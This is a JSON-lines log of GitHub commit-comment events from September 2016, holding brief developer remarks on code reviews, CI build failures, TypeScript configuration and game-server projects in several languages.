{"id":"4635455877","type":"CommitCommentEvent","actor":{"login":"chrisowensboston"},"repo":{"name":"abstractitptyltd/abstractit-puppet"},"payload":{"comment":{"id":19219840,"position":null,"line":null,"path":null,"commit_id":"4a850b0862c6b8328df82ed8b8481e038c3bfb68","created_at":"2016-09-29T07:14:57Z","updated_at":"2016-09-29T07:14:57Z","body":"Mea culpa, it fails the travis CI builds. Something is funny here... fqdn_rand is giving different results on GitHub's travis build than on my own machine, even though the test is supposed to be setting the $fqdn fact.\r\n"}},"created_at":"2016-09-29T07:14:57Z"}
{"id":"4635456688","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"onitake/libArcus"},"payload":{"comment":{"id":19219842,"position":null,"line":null,"path":null,"commit_id":"8ef4f27904b5e1a77c8c6334684769cbcec109f0","created_at":"2016-09-29T07:15:11Z","updated_at":"2016-09-29T07:15:11Z","body":"👌"}},"created_at":"2016-09-29T07:15:11Z"}
{"id":"4635458357","type":"CommitCommentEvent","actor":{"login":"zhangliguo1986"},"repo":{"name":"zhangliguo1986/hello-world"},"payload":{"comment":{"id":19219847,"position":null,"line":null,"path":null,"commit_id":"fe7aadb6e32dbc5aac25eac62f91ad31bade3f60","created_at":"2016-09-29T07:15:36Z","updated_at":"2016-09-29T07:15:36Z","body":"sssss"}},"created_at":"2016-09-29T07:15:36Z"}
{"id":"4635459374","type":"CommitCommentEvent","actor":{"login":"zhangliguo1986"},"repo":{"name":"zhangliguo1986/hello-world"},"payload":{"comment":{"id":19219850,"position":null,"line":null,"path":null,"commit_id":"fe7aadb6e32dbc5aac25eac62f91ad31bade3f60","created_at":"2016-09-29T07:15:53Z","updated_at":"2016-09-29T07:15:53Z","body":"sss"}},"created_at":"2016-09-29T07:15:53Z"}
{"id":"4635459898","type":"CommitCommentEvent","actor":{"login":"rokerwxy"},"repo":{"name":"rokerwxy/addagain"},"payload":{"comment":{"id":19219853,"position":null,"line":null,"path":null,"commit_id":"580ddd56e97364ee185b7fb684c56a20119e140e","created_at":"2016-09-29T07:16:01Z","updated_at":"2016-09-29T07:16:01Z","body":"jjjh"}},"created_at":"2016-09-29T07:16:01Z"}
{"id":"4635461006","type":"CommitCommentEvent","actor":{"login":"ericbottard"},"repo":{"name":"spring-cloud/spring-cloud-dataflow"},"payload":{"comment":{"id":19219856,"position":null,"line":null,"path":null,"commit_id":"dc604f9da42bb3ba7b40240928ee40d6271972a0","created_at":"2016-09-29T07:16:20Z","updated_at":"2016-09-29T07:16:20Z","body":"For some reason, it seems this commit (re)introduced the need to redis to be up to be able to build.\r\ncc @ghillert "}},"created_at":"2016-09-29T07:16:20Z"}
{"id":"4635462210","type":"CommitCommentEvent","actor":{"login":"acolomitchi"},"repo":{"name":"HowardHinnant/date"},"payload":{"comment":{"id":19219861,"position":null,"line":null,"path":null,"commit_id":"e901988cd4c74b6ef331533c703519aee1c8a0c7","created_at":"2016-09-29T07:16:40Z","updated_at":"2016-09-29T07:16:40Z","body":"Thanks. \r\n\r\n:) Let's hope that the idea of printing the time with subseconds in hex (or base64) is a reeaalllly crazy one :)"}},"created_at":"2016-09-29T07:16:40Z"}
{"id":"4635463044","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219864,"position":36,"line":36,"path":"javascript/features/killtime/killtime.test.js","commit_id":"238db8d883503c46b73c7788fb86296a58eda02f","created_at":"2016-09-29T07:16:54Z","updated_at":"2016-09-29T07:16:54Z","body":"No, see other commit-comment. ;+"}},"created_at":"2016-09-29T07:16:54Z"}
{"id":"4635463821","type":"CommitCommentEvent","actor":{"login":"vire"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19219867,"position":17,"line":18,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T07:17:08Z","updated_at":"2016-09-29T07:17:08Z","body":"Withtout `types: [ \"node\" ]` I get following error messages <img width=\"509\" alt=\"tsconfig-node\" src=\"https://cloud.githubusercontent.com/assets/4021908/18944355/589b56e0-8625-11e6-9b7e-4ae0dfa270de.png\">\r\n"}},"created_at":"2016-09-29T07:17:08Z"}
{"id":"4635469379","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219878,"position":8,"line":137,"path":"javascript/features/economy/economy_calculator.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-29T07:18:39Z","updated_at":"2016-09-29T07:18:39Z","body":"Agree, just like startPrizeMoney."}},"created_at":"2016-09-29T07:18:39Z"}
{"id":"4635470575","type":"CommitCommentEvent","actor":{"login":"antoniosai"},"repo":{"name":"feelinc/sikobe"},"payload":{"comment":{"id":19219880,"position":null,"line":null,"path":null,"commit_id":"5518fa27cdcb29649202a193b8aaeb202cddadd9","created_at":"2016-09-29T07:18:58Z","updated_at":"2016-09-29T07:18:58Z","body":"Penambahan di list.blade.php (view information), Posted by -nya udah pakai nama & preview modal"}},"created_at":"2016-09-29T07:18:58Z"}
{"id":"4635472641","type":"CommitCommentEvent","actor":{"login":"smallmin"},"repo":{"name":"PvtTony/waiqingMng"},"payload":{"comment":{"id":19219883,"position":13,"line":80,"path":"src/main/java/me/songt/waiqingMng/service/impl/UserServiceImpl.java","commit_id":"7c4f30683b92cbe51080082dc430777596266065","created_at":"2016-09-29T07:19:31Z","updated_at":"2016-09-29T07:19:31Z","body":"这里忘记改回去了...下个版本记得改成原来的"}},"created_at":"2016-09-29T07:19:31Z"}
{"id":"4635474793","type":"CommitCommentEvent","actor":{"login":"smallmin"},"repo":{"name":"PvtTony/waiqingMng"},"payload":{"comment":{"id":19219887,"position":13,"line":80,"path":"src/main/java/me/songt/waiqingMng/service/impl/UserServiceImpl.java","commit_id":"7c4f30683b92cbe51080082dc430777596266065","created_at":"2016-09-29T07:20:07Z","updated_at":"2016-09-29T07:20:07Z","body":"算了，再发布一个好了=  =。"}},"created_at":"2016-09-29T07:20:07Z"}
{"id":"4635477434","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19219894,"position":60,"line":59,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:20:49Z","updated_at":"2016-09-29T07:20:49Z","body":"Тут забыл, исправлю"}},"created_at":"2016-09-29T07:20:49Z"}
{"id":"4635478099","type":"CommitCommentEvent","actor":{"login":"gabriellupu"},"repo":{"name":"Mangopay/mangopay2-nodejs-sdk"},"payload":{"comment":{"id":19219896,"position":null,"line":null,"path":null,"commit_id":"b12d4b552535622e69ea94e1abea32e661e5374e","created_at":"2016-09-29T07:20:59Z","updated_at":"2016-09-29T07:20:59Z","body":"The implementation looks very good to me. Good job @stefanGhivi "}},"created_at":"2016-09-29T07:20:59Z"}
{"id":"4635479114","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219898,"position":19,"line":148,"path":"javascript/features/economy/economy_calculator.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-29T07:21:16Z","updated_at":"2016-09-29T07:21:16Z","body":"I rather have the way I have written it now, although I would like to rewrite the if-return-return to a one-liner. A one-liner like you propose would in my opinion not improve the readability and is less great for debugging."}},"created_at":"2016-09-29T07:21:16Z"}
{"id":"4635480754","type":"CommitCommentEvent","actor":{"login":"bromagosa"},"repo":{"name":"bromagosa/morphic.js"},"payload":{"comment":{"id":19219900,"position":null,"line":null,"path":null,"commit_id":"a5dd995bc0f8d94e3776b050528cd53e6567292e","created_at":"2016-09-29T07:21:42Z","updated_at":"2016-09-29T07:21:42Z","body":"I didn't use `goEnd` because we need it to work for both `StringMorph`s and `TextMorph`s. In the second, `goEnd` gets the cursor to the end of the line, not the end of the whole text."}},"created_at":"2016-09-29T07:21:42Z"}
{"id":"4635481591","type":"CommitCommentEvent","actor":{"login":"AbduulAhad"},"repo":{"name":"coderexample/datatable_example"},"payload":{"comment":{"id":19219902,"position":302,"line":302,"path":"demo3/css/jquery.dataTables.css","commit_id":"6d609adbba0b18c608705408fb3579c068ec0c7b","created_at":"2016-09-29T07:21:56Z","updated_at":"2016-09-29T07:21:56Z","body":"# sfdghj"}},"created_at":"2016-09-29T07:21:56Z"}
{"id":"4635481659","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219903,"position":30,"line":39,"path":"javascript/features/killtime/killtime.test.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-29T07:21:57Z","updated_at":"2016-09-29T07:21:57Z","body":"I meant this comment in the previous commit.\r\nIf you change it to 52 and 9, then this test will fail. This is not correct!\r\n\r\nCould you perhaps take a look at this?"}},"created_at":"2016-09-29T07:21:57Z"}
{"id":"4635487002","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"google-aosp/platform_frameworks_native"},"payload":{"comment":{"id":19219920,"position":5,"line":794,"path":"libs/gui/SurfaceComposerClient.cpp","commit_id":"0b4cc05bcf2460d8ef84b4eeba1d8ee776cec51e","created_at":"2016-09-29T07:23:22Z","updated_at":"2016-09-29T07:23:22Z","body":"xD! I guess it's not going to use anyway.\r\n#if defined(SE_MHEAP_SCREENSHOT) && !defined(HAWAII_HWC)\r\nI have defined HAWAII_HWC, so this won't be called.\r\n I will update it duh. Lol\r\n\r\n"}},"created_at":"2016-09-29T07:23:22Z"}
{"id":"4635487153","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219921,"position":60,"line":128,"path":"javascript/features/killtime/killtime_manager.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-29T07:23:25Z","updated_at":"2016-09-29T07:23:25Z","body":"I kinda have done this on every feature I have written for now, also on killtime and that Murmur3hash-class. Hence. :)"}},"created_at":"2016-09-29T07:23:25Z"}
{"id":"4635487486","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19219922,"position":null,"line":null,"path":null,"commit_id":"0c1ac3e277f635fdd0f82080c0191c6ac2e0c2b3","created_at":"2016-09-29T07:23:31Z","updated_at":"2016-09-29T07:23:31Z","body":"Without it, font doesn't get applied.\n\nAm 28. September 2016 22:56:36 MESZ, schrieb \"Philip Müller\" <notifications@github.com>:\n>Why is **qt5ct** needed here?\n>\n>-- \n>You are receiving this because you commented.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/manjaro/manjaro-tools-iso-profiles/commit/0c1ac3e277f635fdd0f82080c0191c6ac2e0c2b3#commitcomment-19214576\n\n-- \nDiese Nachricht wurde von meinem Android-Mobiltelefon mit K-9 Mail gesendet."}},"created_at":"2016-09-29T07:23:31Z"}
{"id":"4635488227","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219923,"position":75,"line":60,"path":"javascript/features/killtime/killtime.test.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-29T07:23:44Z","updated_at":"2016-09-29T07:23:44Z","body":"Ack."}},"created_at":"2016-09-29T07:23:44Z"}
{"id":"4635488438","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219925,"position":129,"line":90,"path":"javascript/features/killtime/killtime.test.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-29T07:23:47Z","updated_at":"2016-09-29T07:23:47Z","body":"Ack."}},"created_at":"2016-09-29T07:23:47Z"}
{"id":"4635488676","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219926,"position":51,"line":117,"path":"javascript/features/killtime/killtime_manager.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-29T07:23:51Z","updated_at":"2016-09-29T07:23:51Z","body":"Ack."}},"created_at":"2016-09-29T07:23:51Z"}
{"id":"4635489368","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219927,"position":11,"line":11,"path":"javascript/features/killtime/killtime.test.js","commit_id":"238db8d883503c46b73c7788fb86296a58eda02f","created_at":"2016-09-29T07:24:02Z","updated_at":"2016-09-29T07:24:02Z","body":"Ack."}},"created_at":"2016-09-29T07:24:02Z"}
{"id":"4635489595","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219928,"position":17,"line":17,"path":"javascript/features/killtime/killtime.test.js","commit_id":"238db8d883503c46b73c7788fb86296a58eda02f","created_at":"2016-09-29T07:24:06Z","updated_at":"2016-09-29T07:24:06Z","body":"Ack."}},"created_at":"2016-09-29T07:24:06Z"}
{"id":"4635490079","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219931,"position":18,"line":18,"path":"javascript/features/killtime/killtime.test.js","commit_id":"238db8d883503c46b73c7788fb86296a58eda02f","created_at":"2016-09-29T07:24:14Z","updated_at":"2016-09-29T07:24:14Z","body":"Ack."}},"created_at":"2016-09-29T07:24:14Z"}
{"id":"4635490455","type":"CommitCommentEvent","actor":{"login":"xhoogland"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19219934,"position":43,"line":43,"path":"javascript/features/killtime/killtime.test.js","commit_id":"238db8d883503c46b73c7788fb86296a58eda02f","created_at":"2016-09-29T07:24:20Z","updated_at":"2016-09-29T07:24:20Z","body":"Ack."}},"created_at":"2016-09-29T07:24:20Z"}
{"id":"4635494434","type":"CommitCommentEvent","actor":{"login":"GHa2c"},"repo":{"name":"GHa2c/one"},"payload":{"comment":{"id":19219941,"position":null,"line":null,"path":null,"commit_id":"70852c536921a1518a3d7b0250792ca14f227626","created_at":"2016-09-29T07:25:17Z","updated_at":"2016-09-29T07:25:17Z","body":"one step"}},"created_at":"2016-09-29T07:25:17Z"}
{"id":"4635494652","type":"CommitCommentEvent","actor":{"login":"Hotell"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19219942,"position":2,"line":4,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T07:25:20Z","updated_at":"2016-09-29T07:25:20Z","body":"is this needed?"}},"created_at":"2016-09-29T07:25:20Z"}
{"id":"4635495810","type":"CommitCommentEvent","actor":{"login":"hrach"},"repo":{"name":"nette/forms"},"payload":{"comment":{"id":19219945,"position":null,"line":null,"path":null,"commit_id":"ce893b4e9a5198175647115f61acc43360fb3a08","created_at":"2016-09-29T07:25:39Z","updated_at":"2016-09-29T07:25:39Z","body":"👍 "}},"created_at":"2016-09-29T07:25:39Z"}
{"id":"4635498183","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19219952,"position":127,"line":126,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:26:19Z","updated_at":"2016-09-29T07:26:19Z","body":"А зачем создавать копию? :)"}},"created_at":"2016-09-29T07:26:19Z"}
{"id":"4635499253","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19219954,"position":141,"line":140,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:26:36Z","updated_at":"2016-09-29T07:26:36Z","body":"Сглупил, поправлю"}},"created_at":"2016-09-29T07:26:36Z"}
{"id":"4635500647","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19219958,"position":8,"line":252,"path":"cura/ConvexHullDecorator.py","commit_id":"f3afcb1b366501bac4dddd4c368bbc30e23b8dda","created_at":"2016-09-29T07:26:58Z","updated_at":"2016-09-29T07:26:58Z","body":"Polygon. I'll document it."}},"created_at":"2016-09-29T07:26:58Z"}
{"id":"4635502483","type":"CommitCommentEvent","actor":{"login":"manumanfred"},"repo":{"name":"google-aosp/platform_frameworks_native"},"payload":{"comment":{"id":19219964,"position":5,"line":794,"path":"libs/gui/SurfaceComposerClient.cpp","commit_id":"0b4cc05bcf2460d8ef84b4eeba1d8ee776cec51e","created_at":"2016-09-29T07:27:27Z","updated_at":"2016-09-29T07:27:27Z","body":"But, still you are missing U. :P"}},"created_at":"2016-09-29T07:27:27Z"}
{"id":"4635502703","type":"CommitCommentEvent","actor":{"login":"Diman3589"},"repo":{"name":"Diman3589/triangle"},"payload":{"comment":{"id":19219965,"position":25,"line":24,"path":"Triangle/Triangle/Program.cs","commit_id":"9e895924f4471112a5c477f06084f3c22f2a6a83","created_at":"2016-09-29T07:27:30Z","updated_at":"2016-09-29T07:27:30Z","body":"Что ж поделать, если нужно три конструтора. Другого решения кроме \"фабричных\" методов я не вижу"}},"created_at":"2016-09-29T07:27:30Z"}
{"id":"4635503708","type":"CommitCommentEvent","actor":{"login":"GHa2c"},"repo":{"name":"GHa2c/one"},"payload":{"comment":{"id":19219970,"position":33,"line":33,"path":"index.html","commit_id":"70852c536921a1518a3d7b0250792ca14f227626","created_at":"2016-09-29T07:27:45Z","updated_at":"2016-09-29T07:27:45Z","body":"Two step"}},"created_at":"2016-09-29T07:27:45Z"}
{"id":"4635506433","type":"CommitCommentEvent","actor":{"login":"Hotell"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19219974,"position":19,"line":20,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T07:28:29Z","updated_at":"2016-09-29T07:28:29Z","body":"you don't need this when specified target is `es6`\r\n\r\nfrom TS docs:\r\n\r\n```\r\nNote: If --lib is not specified a default library is injected. \r\nThe default library injected is: \r\n► For --target ES5: dom,es5,scripthost\r\n► For --target ES6: dom,es6,dom.iterable,scripthost\r\n```"}},"created_at":"2016-09-29T07:28:29Z"}
{"id":"4635506671","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"google-aosp/platform_frameworks_native"},"payload":{"comment":{"id":19219975,"position":5,"line":794,"path":"libs/gui/SurfaceComposerClient.cpp","commit_id":"0b4cc05bcf2460d8ef84b4eeba1d8ee776cec51e","created_at":"2016-09-29T07:28:32Z","updated_at":"2016-09-29T07:28:32Z","body":"Yea! I will update it :p "}},"created_at":"2016-09-29T07:28:32Z"}
{"id":"4635507005","type":"CommitCommentEvent","actor":{"login":"JoshSmith"},"repo":{"name":"dennybiasiolli/code-corps-ember"},"payload":{"comment":{"id":19219977,"position":null,"line":null,"path":null,"commit_id":"c2dfaf96f2a2c9827c777f8581ef81c7cd33ba4e","created_at":"2016-09-29T07:28:38Z","updated_at":"2016-09-29T07:28:38Z","body":"Looks great. Rebase and squash and I'll approve and merge in the morning."}},"created_at":"2016-09-29T07:28:38Z"}
{"id":"4635510410","type":"CommitCommentEvent","actor":{"login":"the-Arioch"},"repo":{"name":"dheijl/Delphi-XmlLite"},"payload":{"comment":{"id":19219987,"position":null,"line":null,"path":null,"commit_id":"00ebc43d5f27ccf643b9f09a1220997216ac27a2","created_at":"2016-09-29T07:29:27Z","updated_at":"2016-09-29T07:29:27Z","body":"There are many strange prototypes, like using WideString instead of PWideChar.\r\nI'd stick with some Delphi-native lib, but boss had prejudice against FLOSS, like we still we ib Delphi 7 era...\r\n\r\nOkay, since you're no more in active use of it, i would not bug you. Maybe i would find time to revamp it a bit or more"}},"created_at":"2016-09-29T07:29:27Z"}
{"id":"4635512464","type":"CommitCommentEvent","actor":{"login":"vire"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19219992,"position":2,"line":4,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T07:29:57Z","updated_at":"2016-09-29T07:29:57Z","body":"I guess yes, without some libs have problems ;)\r\n![image](https://cloud.githubusercontent.com/assets/4021908/18944718/3e20d78e-8627-11e6-8e1d-93fd60d18cfb.png)\r\n"}},"created_at":"2016-09-29T07:29:57Z"}
{"id":"4635513291","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19219993,"position":null,"line":null,"path":null,"commit_id":"da6951b1dc9fe639c32a814131a2e23c27e49066","created_at":"2016-09-29T07:30:09Z","updated_at":"2016-09-29T07:30:09Z","body":"wow! cool!\r\ndoes we need extrack mmaps or just use extracted from the link in README?"}},"created_at":"2016-09-29T07:30:09Z"}
{"id":"4635513801","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaArbTypes/ArbFloats.jl"},"payload":{"comment":{"id":19219994,"position":null,"line":null,"path":null,"commit_id":"b2d02758a5ace985452ec92ec204f4907aab07ac","created_at":"2016-09-29T07:30:16Z","updated_at":"2016-09-29T07:30:16Z","body":"note that the trailing dash does not work here\r\n\r\n(don't worry about this for the current tag, can wait)"}},"created_at":"2016-09-29T07:30:16Z"}
{"id":"4635514304","type":"CommitCommentEvent","actor":{"login":"the-Arioch"},"repo":{"name":"dheijl/Delphi-XmlLite"},"payload":{"comment":{"id":19219995,"position":null,"line":null,"path":null,"commit_id":"00ebc43d5f27ccf643b9f09a1220997216ac27a2","created_at":"2016-09-29T07:30:22Z","updated_at":"2016-09-29T07:30:22Z","body":"I wish Delphi interfaces could have inline methods :)"}},"created_at":"2016-09-29T07:30:22Z"}
{"id":"4635517463","type":"CommitCommentEvent","actor":{"login":"Hotell"},"repo":{"name":"vire/hlad-ui"},"payload":{"comment":{"id":19219999,"position":2,"line":4,"path":"tsconfig.json","commit_id":"92fd78c2ce78c52171706ceb70e90bf59474812f","created_at":"2016-09-29T07:31:11Z","updated_at":"2016-09-29T07:31:11Z","body":"oh yeah, good old \"babel\" people with their hacks.... I'm sad "}},"created_at":"2016-09-29T07:31:11Z"}
{"id":"4635518944","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19220002,"position":null,"line":null,"path":null,"commit_id":"0c1ac3e277f635fdd0f82080c0191c6ac2e0c2b3","created_at":"2016-09-29T07:31:33Z","updated_at":"2016-09-29T07:31:33Z","body":"Yes. Looks like configure_environment just got removed...\n\nAm 28. September 2016 23:12:54 MESZ, schrieb \"Philip Müller\" <notifications@github.com>:\n>I can only find this now:\n>\n>https://github.com/manjaro/manjaro-tools/commit/274c4f1707dda2c4a4498336a4adb5478f033ef7\n>https://github.com/manjaro/manjaro-tools-livecd/commit/d43db160e625288fd836823b0608db57cf13cd3a\n>\n>So we have to check how **qt5ct** gets configured now ...\n>\n>-- \n>You are receiving this because you commented.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/manjaro/manjaro-tools-iso-profiles/commit/0c1ac3e277f635fdd0f82080c0191c6ac2e0c2b3#commitcomment-19214822\n\n-- \nDiese Nachricht wurde von meinem Android-Mobiltelefon mit K-9 Mail gesendet."}},"created_at":"2016-09-29T07:31:33Z"}
{"id":"4635520090","type":"CommitCommentEvent","actor":{"login":"watson"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19220004,"position":null,"line":null,"path":null,"commit_id":"4f55158587ab2b701c11085bd39c57d9edb3ea94","created_at":"2016-09-29T07:31:49Z","updated_at":"2016-09-29T07:31:49Z","body":"Cool! No more monkey-patching of timers"}},"created_at":"2016-09-29T07:31:49Z"}
{"id":"4635521652","type":"CommitCommentEvent","actor":{"login":"tyl0re"},"repo":{"name":"kodinerds/repo"},"payload":{"comment":{"id":19220006,"position":4,"line":31,"path":"service.fussballpopup/resources/language/German/strings.xml","commit_id":"f4f64ef7ff9686be3d071831c9a0e4f7a22c7e23","created_at":"2016-09-29T07:32:16Z","updated_at":"2016-09-29T07:32:16Z","body":"Danke ist verbessert"}},"created_at":"2016-09-29T07:32:16Z"}
{"id":"4635522179","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19220007,"position":null,"line":null,"path":null,"commit_id":"84ecb88651dad3abd5c9450b4fdcd6ac2cb53431","created_at":"2016-09-29T07:32:24Z","updated_at":"2016-09-29T07:32:24Z","body":"Mantis discussion for multinum with slider: https://bugs.limesurvey.org/view.php?id=11725\r\nMantis discussion for \"input-addon\" : tested in multiple text only : https://bugs.limesurvey.org/view.php?id=11724"}},"created_at":"2016-09-29T07:32:24Z"}
{"id":"4635522209","type":"CommitCommentEvent","actor":{"login":"tyl0re"},"repo":{"name":"kodinerds/repo"},"payload":{"comment":{"id":19220008,"position":4,"line":28,"path":"service.fussballpopup/resources/language/English/strings.xml","commit_id":"f4f64ef7ff9686be3d071831c9a0e4f7a22c7e23","created_at":"2016-09-29T07:32:24Z","updated_at":"2016-09-29T07:32:24Z","body":"Danke ist verbessert"}},"created_at":"2016-09-29T07:32:24Z"}
{"id":"4635523110","type":"CommitCommentEvent","actor":{"login":"Andrettin"},"repo":{"name":"Andrettin/Wyrmgus"},"payload":{"comment":{"id":19220009,"position":null,"line":null,"path":null,"commit_id":"d26b186c01081081fe86f365c1ace5a732db70f6","created_at":"2016-09-29T07:32:38Z","updated_at":"2016-09-29T07:32:38Z","body":"Thank you! Should be fixed now:\r\nhttps://github.com/Andrettin/Wyrmgus/commit/aa4c7da754798d518b1537b41b3267d40e4e2fc9"}},"created_at":"2016-09-29T07:32:38Z"}
{"id":"4635524953","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19220018,"position":null,"line":null,"path":null,"commit_id":"da6951b1dc9fe639c32a814131a2e23c27e49066","created_at":"2016-09-29T07:33:06Z","updated_at":"2016-09-29T07:33:06Z","body":"mmap в данный момент недоступны. Вернее, в игре не будет разницы включены они или нет. Когда решу проблему, активирую их в конфиге."}},"created_at":"2016-09-29T07:33:06Z"}
{"id":"4635527097","type":"CommitCommentEvent","actor":{"login":"tanqianxiong"},"repo":{"name":"tanqianxiong/test"},"payload":{"comment":{"id":19220023,"position":null,"line":null,"path":null,"commit_id":"58086ad86f98c2087a4f759ff5f3ac670110bc18","created_at":"2016-09-29T07:33:37Z","updated_at":"2016-09-29T07:33:37Z","body":"# new world!"}},"created_at":"2016-09-29T07:33:37Z"}
{"id":"4635531343","type":"CommitCommentEvent","actor":{"login":"alexkulya"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19220030,"position":null,"line":null,"path":null,"commit_id":"da6951b1dc9fe639c32a814131a2e23c27e49066","created_at":"2016-09-29T07:34:41Z","updated_at":"2016-09-29T07:34:41Z","body":"Пока что активно тестирую, плюс к этому заканчиваю скриптовку Tirisfal Glades."}},"created_at":"2016-09-29T07:34:41Z"}
{"id":"4635531743","type":"CommitCommentEvent","actor":{"login":"d0ivanov"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19220032,"position":110,"line":110,"path":"liota/dccs/iotcc.py","commit_id":"990f443b6231e4f127b6b5d08ce4caeaf47fbb2a","created_at":"2016-09-29T07:34:47Z","updated_at":"2016-09-29T07:34:47Z","body":"You should use system.exit() since exit() is a helper method intended for use in the interactive shell, not for use in a program."}},"created_at":"2016-09-29T07:34:47Z"}
{"id":"4635538191","type":"CommitCommentEvent","actor":{"login":"mister-roboto"},"repo":{"name":"plone/plone.server"},"payload":{"comment":{"id":19220045,"position":null,"line":null,"path":null,"commit_id":"ddc2ef18a5cb2d1dda55478ecec50a23004a3080","created_at":"2016-09-29T07:36:24Z","updated_at":"2016-09-29T07:36:24Z","body":"Ramon Navarro Bosch your emails are not known to GithHb and thus it is impossible to know if you have signed the Plone Contributor Agreement, which is required to merge this pull request.\n\nLearn about the Plone Contributor Agreement: http://docs.plone.org/develop/coredev/docs/contributors_agreement_explained.html How to add more emails to your GitHub account: https://help.github.com/articles/adding-an-email-address-to-your-github-account/ "}},"created_at":"2016-09-29T07:36:24Z"}
{"id":"4635544827","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19220055,"position":null,"line":null,"path":null,"commit_id":"da6951b1dc9fe639c32a814131a2e23c27e49066","created_at":"2016-09-29T07:38:04Z","updated_at":"2016-09-29T07:38:04Z","body":"@alexkulya , ок,подробно описал))) отличная работа,бро!\r\nEN: ok, good translate))) good job, bro))"}},"created_at":"2016-09-29T07:38:04Z"}
{"id":"4635546303","type":"CommitCommentEvent","actor":{"login":"Darcidride"},"repo":{"name":"MinetestForFun/server-minetestforfun-skyblock"},"payload":{"comment":{"id":19220060,"position":null,"line":null,"path":null,"commit_id":"015961cbf546cef1c2ec82cc845949e956a17f99","created_at":"2016-09-29T07:38:26Z","updated_at":"2016-09-29T07:38:26Z","body":"I will merge this fix"}},"created_at":"2016-09-29T07:38:26Z"}
